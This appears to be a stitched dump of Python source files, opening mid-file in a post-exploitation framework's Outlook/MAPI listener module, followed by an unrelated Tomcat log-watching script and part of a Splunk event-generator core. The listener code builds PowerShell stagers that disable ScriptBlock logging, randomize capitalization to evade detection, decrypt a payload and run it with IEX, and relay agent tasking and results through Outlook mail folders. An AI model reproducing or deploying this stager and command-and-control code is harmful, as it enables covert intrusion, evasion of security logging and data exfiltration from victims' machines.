print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
stager += "};"
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
stager += "$outlook = New-Object -comobject Outlook.Application;"
stager += helpers.randomize_capitalization('$mapi = $Outlook.GetNameSpace("')
stager += 'MAPI");'
if listenerOptions['Email']['Value'] != '':
stager += '$fld = $outlook.Session.Folders | Where-Object {$_.Name -eq "'+listenerOptions['Email']['Value']+'"} | %{$_.Folders.Item(2).Folders.Item("'+listenerOptions['Folder']['Value']+'")};'
stager += '$fldel = $outlook.Session.Folders | Where-Object {$_.Name -eq "'+listenerOptions['Email']['Value']+'"} | %{$_.Folders.Item(3)};'
else:
stager += '$fld = $outlook.Session.GetDefaultFolder(6).Folders.Item("'+listenerOptions['Folder']['Value']+'");'
stager += '$fldel = $outlook.Session.GetDefaultFolder(3);'
# clear out all existing mails/messages
stager += helpers.randomize_capitalization("while(($fld.Items | measure | %{$_.Count}) -gt 0 ){ $fld.Items | %{$_.delete()};}")
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization('$mail = $outlook.CreateItem(0);$mail.Subject = "')
stager += 'mailpireout";'
stager += helpers.randomize_capitalization('$mail.Body = ')
stager += '"STAGE - %s"' % b64RoutingPacket
stager += helpers.randomize_capitalization(';$mail.save() | out-null;')
stager += helpers.randomize_capitalization('$mail.Move($fld)| out-null;')
stager += helpers.randomize_capitalization('$break = $False; $data = "";')
stager += helpers.randomize_capitalization("While ($break -ne $True){")
stager += helpers.randomize_capitalization('$fld.Items | Where-Object {$_.Subject -eq "mailpirein"} | %{$_.HTMLBody | out-null} ;')
stager += helpers.randomize_capitalization('$fld.Items | Where-Object {$_.Subject -eq "mailpirein" -and $_.DownloadState -eq 1} | %{$break=$True; $data=[System.Convert]::FromBase64String($_.Body);$_.Delete();};}')
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print helpers.color("[!] listeners/http_mapi generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module.")
else:
print helpers.color("[!] listeners/http_mapi generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language="powershell"):
"""
Generate the stager code needed for communications with this listener.
"""
#if not language:
# print helpers.color('[!] listeners/http_mapi generate_stager(): no language specified!')
# return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
folder = listenerOptions['Folder']['Value']
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_mapi.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# patch the server and key information
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('REPLACE_FOLDER', folder)
# patch in working hours if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' is currently supported for this module.")
def generate_agent(self, listenerOptions, language=None):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http_mapi generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
folder = listenerOptions['Folder']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
commsCode = commsCode.replace('REPLACE_FOLDER',folder)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
return code
else:
print helpers.color("[!] listeners/http_mapi generate_agent(): invalid language specification, only 'powershell' is currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
getTask = """
function script:Get-Task {
try {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4;
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket);
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random;
$mail = $outlook.CreateItem(0);
$mail.Subject = "mailpireout";
$mail.Body = "GET - "+$RoutingCookie+" - "+$taskURI;
$mail.save() | out-null;
$mail.Move($fld)| out-null;
# keep checking to see if there is response
$break = $False;
[byte[]]$b = @();
While ($break -ne $True){
foreach ($item in $fld.Items) {
if($item.Subject -eq "mailpirein"){
$item.HTMLBody | out-null;
if($item.Body[$item.Body.Length-1] -ne '-'){
$traw = $item.Body;
$item.Delete();
$break = $True;
$b = [System.Convert]::FromBase64String($traw);
}
}
}
Start-Sleep -s 1;
}
return ,$b
}
catch {
}
while(($fldel.Items | measure | %{$_.Count}) -gt 0 ){ $fldel.Items | %{$_.delete()};}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets;
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5;
# $RoutingPacketp = [System.BitConverter]::ToString($RoutingPacket);
$RoutingPacketp = [Convert]::ToBase64String($RoutingPacket)
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random;
$mail = $outlook.CreateItem(0);
$mail.Subject = "mailpireout";
$mail.Body = "POSTM - "+$taskURI +" - "+$RoutingPacketp;
$mail.save() | out-null;
$mail.Move($fld) | out-null;
}
catch {
}
while(($fldel.Items | measure | %{$_.Count}) -gt 0 ){ $fldel.Items | %{$_.delete()};}
}
}
"""
return updateServers + getTask + sendMessage
else:
print helpers.color("[!] listeners/http_mapi generate_comms(): invalid language specification, only 'powershell' is currently supported for this module.")
else:
print helpers.color('[!] listeners/http_mapi generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 200)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if 'session' in cookie:
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, request.get_data(), listenerOptions, clientIP)
#print dataResults
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 200)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
log-watch.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import glob
import os
import re
from threading import Thread
from time import sleep
from subprocess import call
class AbstractCallback(object):
u"""Absctract class for line callback.
Registred callback will be invked for every new line. If your action depends on more than one line, you have to
maintain state yourself.
"""
def __init__(self):
u"""Constructor. For now it's empty, but invoke this constructor for future compatibility."""
pass
def process_line(self, line, file_name):
u"""Function that will be called for every line"""
raise NotImplementedError
def blink_screen(self):
call("open -a BlinkScreen", shell=True)
def say(self, message):
say = "".join(["say '", message, "'"])
call(say, shell=True)
def notification(self, title, info):
notification = "".join(["osascript -e 'display notification \"", info, "\" with title \"", title, "\"'"])
call(notification, shell=True)
def play_sound(self, sound):
play = "".join(["afplay ", sound])
call(play, shell=True)
class SimpleFindLineAbstractCalback(AbstractCallback):
def __init__(self):
super(SimpleFindLineAbstractCalback, self).__init__()
def process_line(self, line, file_name):
needed_text = self.get_needed_text().lower()
if needed_text in line.lower():
print self.text_reaction()
def async_message():
self.async_reaction()
Thread(target = async_message).start()
def get_needed_text(self):
raise NotImplementedError
def text_reaction(self):
raise NotImplementedError
def async_reaction(self):
raise NotImplementedError
class LogWatch(object):
u"""Class for watching files. Can watch multiple files at once."""
def __init__(self, callbacks, path_pattern="./*.log", last_chars=0, refresh_delay=5):
u"""Constructor.
Callbacks - list of subclases of AbstractCallback.
path_pattern - unix style path pattenr.
last_chars - how many previous chars should be printed. If File is shorter, then will start form begining.
refresh_delay - ms between each refresh
"""
self.callbacks = callbacks
self.path_pattern = path_pattern
self.last_chars = last_chars
self.watched_files = dict()
self.last_file_name = ''
while True: # main loop
self.update_watched_files()
self.tail_for_files()
sleep(refresh_delay)
def update_watched_files(self):
u"""Function finds all files matching self.path_pattern.
If function detect any changes (new files or file name points to different phisical file), updates configuration.
"""
# Get files from unix style path regexp
files = glob.glob(self.path_pattern)
# Remove removed files
for key in list(self.watched_files):
if key not in files:
del self.watched_files[key]
# Generate file ids. Some rotating logs mechanisms maintains constant name for current file.
# We have to check if file name points to the same file, or to new one.
files_stat = [(file_name, os.stat(file_name)) for file_name in files]
files_ids = [(file_name, self.file_id(stat)) for file_name, stat in files_stat]
# Add new files or reset configuration if known file name points to new file.
for file_name, fid in files_ids:
if self.watched_files.has_key(file_name):
watched = self.watched_files[file_name]
if fid != watched['fid']:
self.watched_files[file_name] = self.create_file_record(file_name, fid)
else:
self.watched_files[file_name] = self.create_file_record(file_name, fid)
@staticmethod
def file_id(file_name):
u"""Function generate phisical file indentification.
For rotating log files, sometime current log file has constant name, so every n-hours new file is created for
know name. File identificator helps detecting such changes.
"""
if os.name == 'posix':
return "%x-%x" % (file_name.st_dev, file_name.st_ino)
else:
return "%f" % file_name.st_ctime
@staticmethod
def create_file_record(file_name, fid):
u"""File record for storing informactions about known files."""
return {
'name': file_name,
'fid': fid,
'new': True,
'last_pos': 0,
}
def tail_for_files(self):
u"""Method iterate over files, checking if there is something new."""
for file in self.watched_files.values(): # For every file
with open(file['name'], 'r') as f:
# Set possition, from which to start.
# If new file go to end - self.last_chars. If file is shorter than self.last_chars then start from begining.
# In case of known file, start form last possition.
if file['new']:
try:
f.seek(0 - self.last_chars, 2) # move to end of file - last_chars
except:
f.seek(0) # If file is shorter then move to begining
else:
f.seek(file['last_pos'], 0) # move to last readed possition
# Iterate every new line of current file
while True:
line = f.readline()
if line == '':
break
# File header only if previous content was form different file
if self.last_file_name != file['name']:
self.last_file_name=file['name']
print
print '-----------------------------'
print file['name']
print
print
self.process_line(line, file)
# Update state
file['new'] = False
file['last_pos'] = f.tell()
def process_line(self, line, file):
u"""Call all callbacks for current line"""
for calback in self.callbacks:
calback.process_line(line, file['name'])
class PrintLineCallback(AbstractCallback):
u"""Just print every line. Sample callback, but usefull"""
def __init__(self):
super(PrintLineCallback, self).__init__()
def process_line(self, line, file_name):
print line.rstrip()
class ServerStartUpCallback(AbstractCallback):
u"""Inform when Tomcat server is up and running."""
terminal_message = "Server started in {}"
sound = "~/Library/Sounds/sfx_00001.aiff"
started_in = "You can work. It started in {}"
def __init__(self):
super(ServerStartUpCallback, self).__init__()
self.startup_pattern = re.compile('INFO: Server startup in (\d+) ms')
def process_line(self, line, file_name):
found = self.startup_pattern.search(line.strip())
if found is not None:
time_ms = found.group(1)
formated_time = self.format_time(time_ms)
print ServerStartUpCallback.terminal_message.format(formated_time)
# Executing all commands grouped in this function, takes some time.
# To omit application locking, run it in new thread.
def async_message():
self.notification("Platform is UP", ServerStartUpCallback.started_in.format(formated_time))
self.blink_screen()
# self.play_sound(ServerStartUpCallback.sound)
self.say("Server is UP! You can work!")
Thread(target = async_message).start()
def format_time(self, time):
u"""Format mili seconds to hours, minutes, seconds and miliseconds.
Use only values that are larger than 0 or any previous value was greater than 0"
"""
time = int(time)
mili_seconds = time % 1000
time = time // 1000
seconds = time % 60
time = time // 60
minutes = time % 60
time = time // 60
hours = time
result = ""
previous_appended = False
if hours > 0 or previous_appended:
result = "".join([result, " ", str(hours), "h"])
previous_appended = True
if minutes > 0 or previous_appended:
result = "".join([result, " ", str(minutes), "m"])
previous_appended = True
if seconds > 0 or previous_appended:
result = "".join([result, " ", str(seconds), "s"])
previous_appended = True
if mili_seconds > 0 or previous_appended:
result = "".join([result, " ", str(mili_seconds), "ms"])
previous_appended = True
if not previous_appended:
result = "".join([result, " 0ms"])
return result
class ShutDownCallback(SimpleFindLineAbstractCalback):
def __init__(self):
super(ShutDownCallback, self).__init__()
def get_needed_text(self):
return "<-- Wrapper Stopped"
def text_reaction(self):
return "Server is DONW!"
def async_reaction(self):
self.notification("Platform is DOWN!", "Platform is DOWN!")
self.blink_screen()
self.say("Server is down!")
class RestartingCallback(SimpleFindLineAbstractCalback):
def __init__(self):
super(RestartingCallback, self).__init__()
def get_needed_text(self):
return "JVM requested a restart."
def text_reaction(self):
return "Restarting Requested"
def async_reaction(self):
self.notification("Restarting Requested!", "Restarting Requested!")
self.say("Restarting requested!")
if __name__ == '__main__':
callback_list = [
PrintLineCallback(),
ServerStartUpCallback(),
ShutDownCallback(),
RestartingCallback(),
]
try :
LogWatch(callback_list, "log/tomcat/console-*.log")
except KeyboardInterrupt: # Without catching KeyboardInterrupt, ctrl+c results with ugly stack trace.
print ""
print ""
print "BYE!"
print ""
|
eventgen_core.py
|
#!/usr/bin/env python
# encoding: utf-8
import imp
import json
import logging
import logging.config
import os
import sys
import time
from Queue import Empty, Queue
from threading import Thread
from lib.eventgenconfig import Config
from lib.eventgenexceptions import PluginNotLoaded
from lib.eventgentimer import Timer
from lib.outputcounter import OutputCounter
lib_path_prepend = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib')
sys.path.insert(0, lib_path_prepend)
# Since i'm including a new library but external sources may not have access to pip (like splunk embeded), I need to
# be able to load this library directly from src if it's not installed.
try:
import logutils
import logutils.handlers
except ImportError:
path_prepend = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib', 'logutils_src')
sys.path.append(path_prepend)
import logutils
import logutils.queue
file_path = os.path.dirname(os.path.realpath(__file__))
EVENTGEN_DIR = os.path.realpath(os.path.join(file_path, ".."))
EVENTGEN_ENGINE_CONF_PATH = os.path.abspath(os.path.join(file_path, "default", "eventgen_engine.conf"))
class JSONFormatter(logging.Formatter):
"""
Quick and dirty formatter that turns the log into a quick json format
"""
def format(self, record):
message = record.msg
if not isinstance(message, dict):
# The record is probably a string
try:
message = json.loads(message)
except ValueError:
# Abort, just store the message as an attribute
message = {"message": message}
if "timestamp" not in message:
message["timestamp"] = super(JSONFormatter, self).formatTime(record, self.datefmt)
if "level" not in message:
message["level"] = logging.getLevelName(record.levelno)
return json.dumps(message)
class EventGenerator(object):
def __init__(self, args=None):
'''
This object will allow you to generate and control eventgen. It should be handed the parse_args object
from __main__ and will hand the argument object to the config parser of eventgen5. This will provide the
bridge to using the old code with the newer style. As things get moved from the config parser, this should
start to control all of the configuration items that are global, and the config object should only handle the
localized .conf entries.
:param args: __main__ parse_args() object.
'''
self.stopping = False
self.started = False
self.completed = False
self.config = None
self.args = args
self._setup_loggers(args=args)
# attach to the logging queue
self.logger.info("Logging Setup Complete.")
self._generator_queue_size = getattr(self.args, 'generator_queue_size', 500)
if self._generator_queue_size < 0:
self._generator_queue_size = 0
self.logger.info("set generator queue size to %d", self._generator_queue_size)
if self.args and 'configfile' in self.args and self.args.configfile:
self._load_config(self.args.configfile, args=args)
def _load_config(self, configfile, **kwargs):
'''
This method will use a configfile and set self.confg as a processeded config object,
kwargs will need to match eventgenconfig.py
:param configfile:
:return:
'''
# TODO: The old eventgen had strange cli args. We should probably update the module args to match this usage.
new_args = {}
if "args" in kwargs:
args = kwargs["args"]
outputer = [key for key in ["keepoutput", "devnull", "modinput"] if getattr(args, key)]
if len(outputer) > 0:
new_args["override_outputter"] = outputer[0]
if getattr(args, "count"):
new_args["override_count"] = args.count
if getattr(args, "interval"):
new_args["override_interval"] = args.interval
if getattr(args, "backfill"):
new_args["override_backfill"] = args.backfill
if getattr(args, "end"):
new_args["override_end"] = args.end
if getattr(args, "multiprocess"):
new_args["threading"] = "process"
if getattr(args, "generators"):
new_args["override_generators"] = args.generators
if getattr(args, "disableOutputQueue"):
new_args["override_outputqueue"] = args.disableOutputQueue
if getattr(args, "profiler"):
new_args["profiler"] = args.profiler
if getattr(args, "sample"):
new_args["sample"] = args.sample
if getattr(args, "verbosity"):
new_args["verbosity"] = args.verbosity
self.config = Config(configfile, **new_args)
self.config.parse()
self._reload_plugins()
if "args" in kwargs and getattr(kwargs["args"], "generators"):
generator_worker_count = kwargs["args"].generators
else:
generator_worker_count = self.config.generatorWorkers
# TODO: Probably should destroy pools better so processes are cleaned.
self._setup_pools(generator_worker_count)
def _reload_plugins(self):
# Initialize plugins
# Plugins must be loaded before objects that do work, otherwise threads and processes generated will not have
# the modules loaded in active memory.
try:
self.config.outputPlugins = {}
plugins = self._initializePlugins(
os.path.join(file_path, 'lib', 'plugins', 'output'), self.config.outputPlugins, 'output')
self.config.validOutputModes.extend(plugins)
self._initializePlugins(
os.path.join(file_path, 'lib', 'plugins', 'generator'), self.config.plugins, 'generator')
plugins = self._initializePlugins(
os.path.join(file_path, 'lib', 'plugins', 'rater'), self.config.plugins, 'rater')
self.config._complexSettings['rater'] = plugins
except Exception as e:
self.logger.exception(str(e))
def _load_custom_plugins(self, PluginNotLoadedException):
plugintype = PluginNotLoadedException.type
plugin = PluginNotLoadedException.name
bindir = PluginNotLoadedException.bindir
plugindir = PluginNotLoadedException.plugindir
pluginsdict = self.config.plugins if plugintype in ('generator', 'rater') else self.config.outputPlugins
# APPPERF-263: be picky when loading from an app bindir (only load name)
self._initializePlugins(bindir, pluginsdict, plugintype, name=plugin)
# APPPERF-263: be greedy when scanning plugin dir (eat all the pys)
self._initializePlugins(plugindir, pluginsdict, plugintype)
def _setup_pools(self, generator_worker_count):
'''
This method is an internal method called on init to generate pools needed for processing.
:return:
'''
# Load the things that actually do the work.
self._create_generator_pool()
self._create_timer_threadpool()
self._create_output_threadpool()
self._create_generator_workers(generator_worker_count)
def _create_timer_threadpool(self, threadcount=100):
'''
Timer threadpool is used to contain the timer object for each sample. A timer will stay active
until the end condition is met for the sample. If there is no end condition, the timer will exist forever.
:param threadcount: is how many active timers we want to allow inside of eventgen. Default 100. If someone
has over 100 samples, additional samples won't run until the first ones end.
:return:
'''
self.sampleQueue = Queue(maxsize=0)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.sampleQueue,
self.loggingQueue,
), name="TimeThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_output_threadpool(self, threadcount=1):
'''
the output thread pool is used for output plugins that need to control file locking, or only have 1 set thread
to send all the data out of. This FIFO queue just helps make sure there are file collisions or write collisions.
There's only 1 active thread for this queue, if you're ever considering upping this, don't. Just shut off the
outputQueue and let each generator directly output it's data.
:param threadcount: is how many active output threads we want to allow inside of eventgen. Default 1
:return:
'''
# TODO: Make this take the config param and figure out what we want to do with this.
if getattr(self, "manager", None):
self.outputQueue = self.manager.Queue(maxsize=500)
else:
self.outputQueue = Queue(maxsize=500)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.outputQueue,
self.loggingQueue,
), name="OutputThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_generator_pool(self, workercount=20):
'''
The generator pool has two main options, it can run in multiprocessing or in threading. We check the argument
from configuration, and then build the appropriate queue type. Each time a timer runs for a sample, if the
timer says it's time to generate, it will create a new generator plugin object, and place it in this queue.
:param workercount: is how many active workers we want to allow inside of eventgen. Default 10. If someone
has over 10 generators working, additional samples won't run until the first ones end.
:return:
'''
if self.args.multiprocess:
import multiprocessing
self.manager = multiprocessing.Manager()
if self.config.disableLoggingQueue:
self.loggingQueue = None
else:
# TODO crash caused by logging Thread https://github.com/splunk/eventgen/issues/217
self.loggingQueue = self.manager.Queue()
self.logging_pool = Thread(target=self.logger_thread, args=(self.loggingQueue, ), name="LoggerThread")
self.logging_pool.start()
# since we're now in multiprocess, we need to use better queues.
self.workerQueue = multiprocessing.JoinableQueue(maxsize=self._generator_queue_size)
self.genconfig = self.manager.dict()
self.genconfig["stopping"] = False
else:
self.workerQueue = Queue(maxsize=self._generator_queue_size)
worker_threads = workercount
if hasattr(self.config, 'outputCounter') and self.config.outputCounter:
self.output_counters = []
for i in range(workercount):
self.output_counters.append(OutputCounter())
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue,
self.output_counters[i]))
worker.setDaemon(True)
worker.start()
else:
